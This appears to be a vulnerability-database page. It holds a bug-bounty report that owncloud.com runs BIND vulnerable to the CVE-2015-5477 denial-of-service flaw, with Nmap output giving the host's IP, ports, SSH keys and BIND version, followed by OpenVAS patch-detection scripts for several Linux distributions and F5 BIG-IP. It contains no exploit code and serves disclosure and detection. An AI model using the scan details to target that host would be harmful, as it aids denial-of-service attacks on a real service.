ID H1:89097 Type hackerone Reporter 1n3 Modified 2015-09-16T08:25:57
Description
owncloud.com appears to be vulnerable to CVE-2015-5477 based on the running version of BIND. This allows attackers to launch Denial of Service attacks against owncloud.com which would result in the owncloud server to stop responding and even reboot. It is recommended to upgrade to the latest version of ISC Bind.
NMap Scan Results:
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-15 14:37 EDT
Warning: 50.30.33.235 giving up on port because retransmission cap hit (6).
Nmap scan report for owncloud.com (50.30.33.235)
Host is up (0.041s latency).
rDNS record for 50.30.33.235: www.owncloud.com
Not shown: 993 closed ports, 3 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.8 (protocol 2.0)
| ssh-hostkey:
| 1024 96:ad:80:e0:cb:33:02:47:67:6b:1c:f1:29:7e:e7:c6 (DSA)
| 1024 68:ee:34:57:52:e5:fe:7b:7b:32:86:d9:99:57:08:73 (RSA)
| 256 fb:b8:b5:5b:7a:b2:46:61:f2:87:e7:2b:0d:c7:bc:2d (ECDSA)
53/tcp open domain
| dns-nsid:
| bind.version: 9.9.4-rpz2.13269.14-P2
{"openvas": [{"lastseen": "2019-05-29T18:36:53", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-08-03T00:00:00", "type": "openvas", "title": "RedHat Update for bind97 RHSA-2015:1515-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310871419", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871419", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for bind97 RHSA-2015:1515-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871419\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-08-03 15:07:59 +0530 (Mon, 03 Aug 2015)\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for bind97 RHSA-2015:1515-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bind97'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named) a resolver\nlibrary (routines for applications to use when interfacing with DNS) and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind97 users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\");\n script_tag(name:\"affected\", value:\"bind97 on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:1515-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-July/msg00052.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind97\", rpm:\"bind97~9.7.0~21.P2.el5_11.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind97-chroot\", rpm:\"bind97-chroot~9.7.0~21.P2.el5_11.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind97-debuginfo\", rpm:\"bind97-debuginfo~9.7.0~21.P2.el5_11.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind97-devel\", rpm:\"bind97-devel~9.7.0~21.P2.el5_11.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind97-libs\", rpm:\"bind97-libs~9.7.0~21.P2.el5_11.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind97-utils\", rpm:\"bind97-utils~9.7.0~21.P2.el5_11.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:22", "description": "Check the version of bind", "cvss3": {}, "published": "2015-08-10T00:00:00", "type": "openvas", "title": "CentOS Update for bind CESA-2015:1514 centos5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2019-03-08T00:00:00", "id": "OPENVAS:1361412562310882235", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882235", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for bind CESA-2015:1514 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882235\");\n script_version(\"$Revision: 14058 $\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-08-10 12:58:28 +0530 (Mon, 10 Aug 2015)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for bind CESA-2015:1514 centos5\");\n script_tag(name:\"summary\", value:\"Check the version of bind\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named) a resolver\nlibrary (routines for applications to use when interfacing with DNS) and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\");\n script_tag(name:\"affected\", value:\"bind on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"CESA\", value:\"2015:1514\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2015-July/021270.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.3.6~25.P1.el5_11.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.3.6~25.P1.el5_11.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.3.6~25.P1.el5_11.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libbind-devel\", rpm:\"bind-libbind-devel~9.3.6~25.P1.el5_11.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.3.6~25.P1.el5_11.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.3.6~25.P1.el5_11.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.3.6~25.P1.el5_11.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"caching-nameserver\", rpm:\"caching-nameserver~9.3.6~25.P1.el5_11.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-03-17T22:59:45", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2015-09-08T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2015-573)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120279", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120279", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120279\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:22:28 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2015-573)\");\n script_tag(name:\"insight\", value:\"As reported upstream, an error in the handling of TKEY queries can be exploited by an attacker for use as a denial-of-service vector, as a constructed packet can use the defect to trigger a REQUIRE assertion failure, causing BIND to exit.\");\n script_tag(name:\"solution\", value:\"Run yum update bind to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-573.html\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.8.2~0.30.rc1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.8.2~0.30.rc1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.8.2~0.30.rc1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.8.2~0.30.rc1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.8.2~0.30.rc1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.8.2~0.30.rc1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.8.2~0.30.rc1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:34", "description": "Check the version of bind", "cvss3": {}, "published": "2015-08-10T00:00:00", "type": "openvas", "title": "CentOS Update for bind CESA-2015:1513 centos7", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2019-03-08T00:00:00", "id": "OPENVAS:1361412562310882234", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882234", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for bind CESA-2015:1513 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882234\");\n script_version(\"$Revision: 14058 $\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-08-10 12:58:28 +0530 (Mon, 10 Aug 2015)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for bind CESA-2015:1513 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of bind\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named) a resolver\nlibrary (routines for applications to use when interfacing with DNS) and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\");\n script_tag(name:\"affected\", value:\"bind on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"CESA\", value:\"2015:1513\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2015-July/021268.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.9.4~18.el7_1.3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.9.4~18.el7_1.3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.9.4~18.el7_1.3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.9.4~18.el7_1.3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs-lite\", rpm:\"bind-libs-lite~9.9.4~18.el7_1.3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-license\", rpm:\"bind-license~9.9.4~18.el7_1.3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-lite-devel\", rpm:\"bind-lite-devel~9.9.4~18.el7_1.3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.9.4~18.el7_1.3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-sdb-chroot\", rpm:\"bind-sdb-chroot~9.9.4~18.el7_1.3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.9.4~18.el7_1.3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-04-07T18:46:22", "description": "The remote host is missing a security patch.", "cvss3": {}, "published": "2015-09-18T00:00:00", "type": "openvas", "title": "F5 BIG-IP - SOL16909 - BIND vulnerability CVE-2015-5477", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2020-04-03T00:00:00", "id": "OPENVAS:1361412562310105366", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105366", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# F5 BIG-IP - SOL16909 - BIND vulnerability CVE-2015-5477\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105366\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_version(\"2020-04-03T06:15:47+0000\");\n\n script_name(\"F5 BIG-IP - SOL16909 - BIND vulnerability CVE-2015-5477\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/kb/en-us/solutions/public/16000/900/sol16909.html?sr=48315759\");\n\n script_tag(name:\"impact\", value:\"A remote attacker may be able to cause a denial-of-service (DoS) attack on the BIG-IP system's local instance of BIND by using a specially crafted DNS request in configurations that expose BIND to requests from untrusted users.Note: If the BIND daemon stops responding, services that do not rely on the use of local instances of BIND will continue to function.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An error in the handling of TKEY queries can be exploited by an attacker for use as a denial-of-service vector, as a constructed packet can use the defect to trigger a REQUIRE assertion failure, causing BIND to exit. (CVE-2015-5477)\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing a security patch.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 06:15:47 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-09-18 15:17:44 +0200 (Fri, 18 Sep 2015)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '11.6.0;11.0.0-11.5.3;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;11.6.0_HF6;11.5.4;11.5.3_HF2;11.4.1_HF9;11.2.1_HF15;10.2.4_HF12;' );\n\ncheck_f5['AAM'] = make_array( 'affected', '11.6.0;11.4.0-11.5.3;',\n 'unaffected', '12.0.0;11.6.0_HF6;11.5.4;11.5.3_HF2;11.4.1_HF9;' );\n\ncheck_f5['AFM'] = make_array( 'affected', '11.6.0;11.3.0-11.5.3;',\n 'unaffected', '12.0.0;11.6.0_HF6;11.5.4;11.5.3_HF2;11.4.1_HF9;' );\n\ncheck_f5['AVR'] = make_array( 'affected', '11.6.01;11.0.0-11.5.31;',\n 'unaffected', '12.0.0;11.6.0_HF6;11.5.4;11.5.3_HF2;11.4.1_HF9;11.2.1_HF15;' );\n\ncheck_f5['APM'] = make_array( 'affected', '11.6.0;11.0.0-11.5.3;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;11.6.0_HF6;11.5.4;11.5.3_HF2;11.4.1_HF9;11.2.1_HF15;10.2.4_HF12;' );\n\ncheck_f5['ASM'] = make_array( 'affected', '11.6.0;11.0.0-11.5.3;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;11.6.0_HF6;11.5.4;11.5.3_HF2;11.4.1_HF9;11.2.1_HF15;10.2.4_HF12;' );\n\ncheck_f5['GTM'] = make_array( 'affected', '11.6.0;11.0.0-11.5.3;10.1.0-10.2.4;',\n 'unaffected', '11.6.0_HF6;11.5.4;11.5.3_HF2;11.4.1_HF9;11.2.1_HF15;10.2.4_HF12;' );\n\ncheck_f5['LC'] = make_array( 'affected', '11.6.0;11.0.0-11.5.3;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;11.6.0_HF6;11.5.4;11.5.3_HF2;11.4.1_HF9;11.2.1_HF15;10.2.4_HF12;' );\n\ncheck_f5['PEM'] = make_array( 'affected', '11.6.0;11.3.0-11.5.3;',\n 'unaffected', '12.0.0;11.6.0_HF6;11.5.4;11.5.3_HF2;11.4.1_HF9;' );\n\ncheck_f5['PSM'] = make_array( 'affected', '11.0.0-11.4.1;10.1.0-10.2.4;',\n 'unaffected', '11.4.1_HF9;11.2.1_HF15;10.2.4_HF12;' );\n\ncheck_f5['WAM'] = make_array( 'affected', '11.0.0-11.3.0;10.1.0-10.2.4;',\n 'unaffected', '11.2.1_HF15;10.2.4_HF12;' );\n\ncheck_f5['WOM'] = make_array( 'affected', '11.0.0-11.3.0;10.1.0-10.2.4;',\n 'unaffected', '11.2.1_HF15;10.2.4_HF12;' );\n\nif( report = f5_is_vulnerable( ca:check_f5, version:version ) ) {\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2017-07-24T12:53:07", "description": "Jonathan Foote discovered that the BIND DNS server does not properly\nhandle TKEY queries. A remote attacker can take advantage of this flaw\nto mount a denial of service via a specially crafted query triggering an\nassertion failure and causing BIND to exit.", "cvss3": {}, "published": "2015-07-28T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3319-1 (bind9 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703319", "href": "http://plugins.openvas.org/nasl.php?oid=703319", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3319.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3319-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703319);\n script_version(\"$Revision: 6609 $\");\n 